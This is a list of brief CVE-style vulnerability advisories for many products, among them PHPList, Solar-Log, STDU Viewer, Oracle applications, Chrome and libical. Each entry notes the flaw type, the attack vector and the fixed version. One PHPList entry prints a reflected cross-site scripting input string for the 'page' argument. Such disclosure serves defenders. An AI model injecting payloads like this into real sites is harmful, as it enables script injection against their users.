A vulnerability was found in Navetti PricePoint 4.6.0.0. It has been classified as problematic. This affects an unknown part. The manipulation leads to basic cross site scripting (Reflected). It is possible to initiate the attack remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Navetti PricePoint 4.6.0.0 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting (Persistent). The attack may be launched remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability has been found in Navetti PricePoint 4.6.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection (Blind). The attack can be launched remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Ucweb UC Browser 11.2.5.932. It has been classified as critical. Affected is an unknown function of the component HTML Handler. The manipulation of the argument title leads to improper restriction of rendered ui layers (URL). It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SICUNET Access Controller 0.32-05z. It has been declared as problematic. This vulnerability affects unknown code of the component Password Storage. The manipulation leads to weak encryption. Attacking locally is a requirement.
A vulnerability was found in SICUNET Access Controller 0.32-05z. It has been classified as very critical. This affects an unknown part. The manipulation leads to weak authentication. It is possible to initiate the attack remotely.
A vulnerability was found in SICUNET Access Controller 0.32-05z and classified as critical. Affected by this issue is some unknown functionality of the file card_scan_decoder.php. The manipulation of the argument No/door leads to privilege escalation. The attack may be launched remotely.
A vulnerability has been found in SICUNET Access Controller 0.32-05z and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument c leads to privilege escalation. The attack can be launched remotely.
A vulnerability, which was classified as problematic, was found in PHPList 3.2.6. Affected is an unknown function of the file /lists/admin/ of the component Bounce Rule. The manipulation leads to cross site scripting (Persistent). It is possible to launch the attack remotely. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, has been found in PHPList 3.2.6. This issue affects some unknown processing of the file /lists/admin/ of the component Subscribe. The manipulation leads to cross site scripting (Persistent). The attack may be initiated remotely. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic was found in PHPList 3.2.6. This vulnerability affects unknown code of the file /lists/admin/ of the component List Name. The manipulation leads to cross site scripting (Persistent). The attack can be initiated remotely. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic has been found in PHPList 3.2.6. This affects an unknown part of the file /lists/admin/. The manipulation of the argument page with the input send\'\";&gt;&lt;script&gt;alert(8)&lt;/script&gt; leads to cross site scripting (Reflected). It is possible to initiate the attack remotely. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in PHPList 3.2.6. It has been rated as critical. Affected by this issue is some unknown functionality of the component Subscription. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in PHPList 3.2.6. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument sortby with the input password leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in PHPList 3.2.6. It has been classified as critical. Affected is an unknown function of the file /lists/admin/ of the component Sending Campain. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in PHPList 3.2.6 and classified as critical. This issue affects some unknown processing of the file /lists/index.php of the component Edit Subscription. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in HumHub 0.20.1/1.0.0-beta.3. It has been classified as critical. This affects an unknown part. The manipulation leads to privilege escalation. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in HumHub up to 1.0.1 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting (DOM). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability has been found in HumHub up to 1.0.1 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting (Reflected). The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Solare Solar-Log 2.8.4-56/3.5.2-85. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Flash Memory. The manipulation leads to privilege escalation. The attack can be launched remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Solare Solar-Log 2.8.4-56/3.5.2-85. It has been classified as problematic. Affected is an unknown function. The manipulation leads to denial of service. It is possible to launch the attack remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Solare Solar-Log 2.8.4-56/3.5.2-85 and classified as critical. This issue affects some unknown processing of the component Network Config. The manipulation leads to privilege escalation. The attack may be initiated remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability has been found in Solare Solar-Log 2.8.4-56/3.5.2-85 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to information disclosure. The attack can be initiated remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as critical, was found in Solare Solar-Log 2.8.4-56/3.5.2-85. This affects an unknown part of the component File Upload. The manipulation leads to privilege escalation. It is possible to initiate the attack remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, has been found in Solare Solar-Log 2.8.4-56/3.5.2-85. Affected by this issue is some unknown functionality. The manipulation leads to cross site request forgery. The attack may be launched remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic was found in Solare Solar-Log 2.8.4-56/3.5.2-85. Affected by this vulnerability is an unknown functionality of the component Config Handler. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in XAMPP 7.1.1-0-VC14. It has been classified as problematic. Affected is an unknown function of the component Installer. The manipulation leads to privilege escalation. It is possible to launch the attack remotely.
A vulnerability, which was classified as critical, has been found in The Next Generation of Genealogy Sitebuilding up to 11.1.0. This issue affects some unknown processing of the file /timeline2.php. The manipulation of the argument primaryID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.1.1 is able to address this issue. It is recommended to upgrade the affected component.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in WEKA INTEREST Security Scanner up to 1.8 and classified as problematic. This vulnerability affects unknown code of the component Portscan. The manipulation with an unknown input leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in WEKA INTEREST Security Scanner up to 1.8. This affects an unknown part of the component LAN Viewer. The manipulation with an unknown input leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in WEKA INTEREST Security Scanner up to 1.8. Affected by this issue is some unknown functionality of the component Webspider. The manipulation with an unknown input leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in WEKA INTEREST Security Scanner 1.8. It has been rated as problematic. This issue affects some unknown processing of the component HTTP Handler. The manipulation with an unknown input leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a "pointer leak."
In Netwide Assembler (NASM) 2.14rc0, there is a "SEGV on unknown address" that will cause a remote denial of service attack, because asm/preproc.c mishandles macro calls that have the wrong number of arguments.
IBM MQ Managed File Transfer Agent 8.0 and 9.0 sets insecure permissions on certain files it creates. A local attacker could exploit this vulnerability to modify or delete data contained in the files with an unknown impact. IBM X-Force ID: 134391.
XnView Classic for Windows Version 2.43 allows attackers to execute arbitrary code or cause a denial of service via a crafted .dwg file, related to a "Data Execution Prevention Violation near NULL starting at Unknown Symbol @ 0x0000000000000000 called from CADImage+0x0000000000286a79."
IrfanView 4.50 - 64bit with CADImage plugin version 12.0.0.5 allows attackers to execute arbitrary code or cause a denial of service via a crafted .dwg file, related to a "Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000700b00260112 called from CADIMAGE+0x00000000003d35ad."
Mahara 15.04 before 15.04.15, 16.04 before 16.04.9, 16.10 before 16.10.6, and 17.04 before 17.04.4 are vulnerable to a user submitting a potential dangerous payload, e.g., XSS code, to be saved as their first name, last name, or display name in the profile fields that can cause issues such as escalation of privileges or unknown execution of malicious code when replying to messages in Mahara.
An authentication bypass was found in an unknown area of the SiteOmat source code. All SiteOmat BOS versions are affected, prior to the submission of this exploit. Also, the SiteOmat does not force administrators to switch passwords, leaving SSH and HTTP remote authentication open to public.
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to a "Read Access Violation on Control Flow starting at Unknown Symbol @ 0x0000000003aa7cef called from Unknown Symbol @ 0x0000000004aa024d."
STDU Viewer 1.6.375 allows attackers to cause a denial of service or possibly have unspecified other impact via a crafted .xps file, related to a "Possible Stack Corruption starting at Unknown Symbol @ 0x00000000049f0281."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to an "Illegal Instruction Violation starting at Unknown Symbol @ 0x0000000002d8024c called from STDUXPSFile!DllUnregisterServer+0x000000000002566c."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to a "User Mode Write AV starting at Unknown Symbol @ 0x0000000004940490."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to an "Illegal Instruction Violation starting at Unknown Symbol @ 0x00000000030c024c called from STDUXPSFile!DllUnregisterServer+0x000000000002566a."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to a "User Mode Write AV starting at Unknown Symbol @ 0x000000000479049b called from Unknown Symbol @ 0x000000000d89645b."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to an "Illegal Instruction Violation starting at Unknown Symbol @ 0x00000000049c024c called from STDUXPSFile!DllUnregisterServer+0x0000000000025706."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to an "Illegal Instruction Violation starting at Unknown Symbol @ 0x000000000297024c called from STDUXPSFile!DllUnregisterServer+0x0000000000025630."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to an "Illegal Instruction Violation starting at Unknown Symbol @ 0x00000000028c024d called from STDUXPSFile!DllUnregisterServer+0x000000000002e77b."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to a "User Mode Write AV starting at Unknown Symbol @ 0x00000000039d76c4 called from Unknown Symbol @ 0x0000000000049d2c."
STDU Viewer 1.6.375 allows attackers to cause a denial of service or possibly have unspecified other impact via a crafted .xps file, related to a "Possible Stack Corruption starting at Unknown Symbol @ 0x00000000038f2fbf called from image00000000_00400000+0x0000000000240065."
STDU Viewer 1.6.375 allows attackers to execute arbitrary code or cause a denial of service via a crafted .xps file, related to an "Illegal Instruction Violation starting at Unknown Symbol @ 0x00000000048c024d called from STDUXPSFile!DllUnregisterServer+0x0000000000025638."
DeleteBitBuffer in libbitbuf/bitbuffer.c in mp4tools aacplusenc 0.17.5 allows remote attackers to cause a denial of service (invalid memory write, SEGV on unknown address 0x000000000030, and application crash) or possibly have unspecified other impact via a crafted .wav file, aka a NULL pointer dereference.
IBM Integration Bus 9.0.0.0, 9.0.0.11, 10.0.0.0, and 10.0.0.14 (including IBM WebSphere Message Broker 8.0.0.0 and 8.0.0.9) has insecure permissions on certain files. A local attacker could exploit this vulnerability to modify or delete these files with an unknown impact. IBM X-Force ID: 127406.
IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 might create files using the default permissions instead of the customized permissions when custom startup scripts are used. A local attacker could exploit this to gain access to files with an unknown impact. IBM X-Force ID: 127153.
Double free vulnerability in the _zip_dirent_read function in zip_dirent.c in libzip allows attackers to have unspecified impact via unknown vectors.
Memory leak in the ccnl_app_RX function in ccnl-uapi.c in CCN-lite before 2.00 allows context-dependent attackers to cause a denial of service (memory consumption) via vectors involving an envelope_s structure pointer when the packet format is unknown.
XnView Classic for Windows Version 2.40 allows attackers to execute arbitrary code or cause a denial of service via a crafted .rle file, related to a "Data Execution Prevention Violation starting at Unknown Symbol @ 0x00000000380a0500 called from ntdll_77df0000!LdrxCallInitRoutine+0x0000000000000016."
XnView Classic for Windows Version 2.40 allows attackers to execute arbitrary code or cause a denial of service via a crafted .rle file, related to a "Data Execution Prevention Violation starting at Unknown Symbol @ 0x000000000c1b541c called from xnview+0x00000000003826ec."
XnView Classic for Windows Version 2.40 allows attackers to execute arbitrary code or cause a denial of service via a crafted .rle file, related to a "Data Execution Prevention Violation starting at Unknown Symbol @ 0x000000002f32332f called from KERNELBASE!CompareStringW+0x0000000000000082."
Multiple integer overflows in libwebp allows attackers to have unspecified impact via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.54 and 8.55 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Platform Security for Java component in Oracle Fusion Middleware 12.1.3.0.0, 12.2.1.0.0, and 12.2.1.1.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-5536.
Heap-based buffer overflow in the EscapeParenthesis function in GraphicsMagick before 1.3.25 allows remote attackers to have unspecified impact via unknown vectors.
Buffer overflow in the MVG and SVG rendering code in GraphicsMagick 1.3.24 allows remote attackers to have unspecified impact via unknown vectors. Note: This vulnerability exists due to an incomplete patch for CVE-2016-2317.
NTP before 4.2.8p9 does not properly perform the initial sync calculations, which allows remote attackers to unspecified impact via unknown vectors, related to a "root distance that did not include the peer dispersion."
Microsoft SQL Server 2012 SP2 and 2012 SP3 does not properly perform a cast of an unspecified pointer, which allows remote authenticated users to gain privileges via unknown vectors, aka "SQL RDBMS Engine Elevation of Privilege Vulnerability."
Microsoft SQL Server 2014 SP1, 2014 SP2, and 2016 does not properly perform a cast of an unspecified pointer, which allows remote authenticated users to gain privileges via unknown vectors, aka "SQL RDBMS Engine Elevation of Privilege Vulnerability."
Microsoft SQL Server 2016 does not properly perform a cast of an unspecified pointer, which allows remote authenticated users to gain privileges via unknown vectors, aka "SQL RDBMS Engine Elevation of Privilege Vulnerability."
Cross-site scripting (XSS) vulnerability in an unspecified page template in Plone CMS 5.x through 5.0.6, 4.x through 4.3.11, and 3.3.x through 3.3.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Infinite recursion in wddx in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors.
The array_*_recursive functions in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors, related to recursion.
Self recursion in compact in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors.
Integer overflow in StringUtil::implode in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors.
Integer overflow in bcmath in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors, which triggers a buffer overflow.
Out-of-bounds write in the (1) mb_detect_encoding, (2) mb_send_mail, and (3) mb_detect_order functions in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors.
drivers/video/msm/mdss/mdss_mdp_pp.c in the Qualcomm MDSS driver in Android before 2016-10-05 allows attackers to cause a denial of service (invalid pointer access) or possibly have unspecified other impact via unknown vectors, aka Qualcomm internal bug CR 1004933.
NULL pointer dereference in Samsung Exynos fimg2d driver for Android L(5.0/5.1) and M(6.0) allows attackers to have unspecified impact via unknown vectors. The Samsung ID is SVE-2016-6382.
Integer overflow in the MDC2_Update function in crypto/mdc2/mdc2dgst.c in OpenSSL before 1.1.0 allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.
The multi-tenant database container feature in SAP HANA does not properly encrypt communications, which allows remote attackers to bypass intended access restrictions and possibly have unspecified other impact via unknown vectors, aka SAP Security Note 2233550.
An unspecified function in SAP TREX 7.10 Revision 63 allows remote attackers to execute arbitrary OS commands via unknown vectors, aka SAP Security Note 2203591.
Multiple heap-based buffer overflows in the hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux kernel through 4.6.3 allow local users to cause a denial of service or possibly have unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call.
The icaltime_from_string function in libical 0.47 and 1.0 allows remote attackers to cause a denial of service (out-of-bounds heap read) via a crafted string to the icalparser_parse_string function.
The parser_get_next_char function in libical 0.47 and 1.0 allows remote attackers to cause a denial of service (out-of-bounds heap read) by crafting a string to the icalparser_parse_string function.
The icalparser_parse_string function in libical 0.47 and 1.0 allows remote attackers to cause a denial of service (out-of-bounds heap read) via a crafted ics file.
libical 1.0 allows remote attackers to cause a denial of service (use-after-free) via a crafted ics file.
The icalproperty_new_clone function in libical 0.47 and 1.0 allows remote attackers to cause a denial of service (use-after-free) via a crafted ics file.
Unspecified vulnerability in the PeopleSoft Enterprise SCM Services Procurement component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Customer Interaction History component in Oracle E-Business Suite 12.1.1 through 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5592.
Unspecified vulnerability in the Oracle Customer Interaction History component in Oracle E-Business Suite 12.1.1 through 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5587 and CVE-2016-5591.
Unspecified vulnerability in the Oracle Customer Interaction History component in Oracle E-Business Suite 12.1.1 through 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5595.
Unspecified vulnerability in the Oracle Customer Interaction History component in Oracle E-Business Suite 12.1.1 through 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5587 and CVE-2016-5593.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Customer Interaction History component in Oracle E-Business Suite 12.1.1 through 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5591 and CVE-2016-5593.
Unspecified vulnerability in the Oracle Email Center component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Interaction Center Intelligence component in Oracle E-Business Suite 12.1.1 through 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle One-to-One Fulfillment component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle iRecruitment component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Kernel PDB component in Oracle Database Server 12.1.0.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Enterprise Limits and Collateral Management component in Oracle Financial Services Applications 12.0.0 and 12.1.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 11.3 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle iProcurement component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Advanced Pricing component in Oracle E-Business Suite 12.1.1 through 12.1.3 and 12.2.3 through 12.2.6 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the OJVM component in Oracle Database Server 11.2.0.4 and 12.1.0.2 allows remote administrators to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11.3 allows local users to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Retail Xstore Payment component in Oracle Retail Applications 1.x allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Retail Xstore Payment component in Oracle Retail Applications 1.x allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the NetBeans component in Oracle Fusion Middleware 8.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information is from the October 2016 CPU. Oracle has not commented on third-party claims that this issue is a directory traversal vulnerability which allows local users with certain permissions to write to arbitrary files and consequently gain privileges via a .. (dot dot) in a archive entry in a ZIP file imported as a project.
Unspecified vulnerability in the Oracle Platform Security for Java component in Oracle Fusion Middleware 12.1.3.0.0, 12.2.1.0.0, and 12.2.1.1.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-8281.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, 12.2.1.0, and 12.2.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Siebel Apps - Customer Order Management component in Oracle Siebel CRM 16.1 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 8.4, 15.x, and 16.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2016-5524.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2016-5527.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5512.
Unspecified vulnerability in the Kernel PDB component in Oracle Database Server 12.1.0.2 allows local users to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-5521.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 12.2.1.0.0, 12.2.1.1.0, and 12.2.1.2.0 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the RDBMS Programmable Interface component in Oracle Database Server 11.2.0.4 and 12.1.0.2 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 11.2.0.4 and 12.1.0.2 allows local users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2016-5498.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 11.2.0.4 and 12.1.0.2 allows local users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2016-5499.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 12.1.0.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Private Banking component in Oracle Financial Services Applications 12.0.1 through 12.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Commerce Service Center component in Oracle Commerce 10.0.3.5 and 10.2.0.5 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 11.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Commerce Guided Search component in Oracle Commerce 6.2.2, 6.3.0, 6.4.1.2, and 6.5.0 through 6.5.2 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Use-after-free vulnerability in libcurl before 7.50.1 allows attackers to control which connection is used or possibly have unspecified other impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in NetApp Snap Creator Framework before 4.3.0P1 allows remote attackers to hijack the authentication of users for requests that have unspecified impact via unknown vectors.
HAproxy 1.6.x before 1.6.6, when a deny comes from a reqdeny rule, allows remote attackers to cause a denial of service (uninitialized memory access and crash) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 49.0, Firefox ESR 45.x before 45.4 and Thunderbird &lt; 45.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 49.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 53.0.2785.143 allow remote attackers to cause a denial of service or possibly have other impact via unknown vectors.
Use-after-free vulnerability in V8 in Google Chrome before 53.0.2785.143 allows remote attackers to cause a denial of service (crash) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 53.0.2785.113 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Format string vulnerability in Google Chrome OS before 53.0.2785.103 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 53.0.2785.89 on Windows and OS X and before 53.0.2785.92 on Linux allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
extensions/renderer/event_bindings.cc in the event bindings in Google Chrome before 53.0.2785.89 on Windows and OS X and before 53.0.2785.92 on Linux attempts to process filtered events after failure to add an event matcher, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.116 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
ZOHO ManageEngine ServiceDesk Plus before 9.0 allows remote authenticated guest users to have unspecified impact by leveraging failure to restrict access to unknown functions.
Pulse Connect Secure (PCS) 8.2 before 8.2r1, 8.1 before 8.1r2, 8.0 before 8.0r10, and 7.4 before 7.4r13.4 allow remote attackers to read an unspecified system file via unknown vectors.
Pulse Connect Secure (PCS) 8.2 before 8.2r1, 8.1 before 8.1r2, 8.0 before 8.0r10, and 7.4 before 7.4r13.4 allow remote attackers to read sensitive system authentication files in an unspecified directory via unknown vectors.
libxml2 in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4614, CVE-2016-4615, and CVE-2016-4619.
libxml2 in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4614, CVE-2016-4616, and CVE-2016-4619.
libxml2 in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4615, CVE-2016-4616, and CVE-2016-4619.
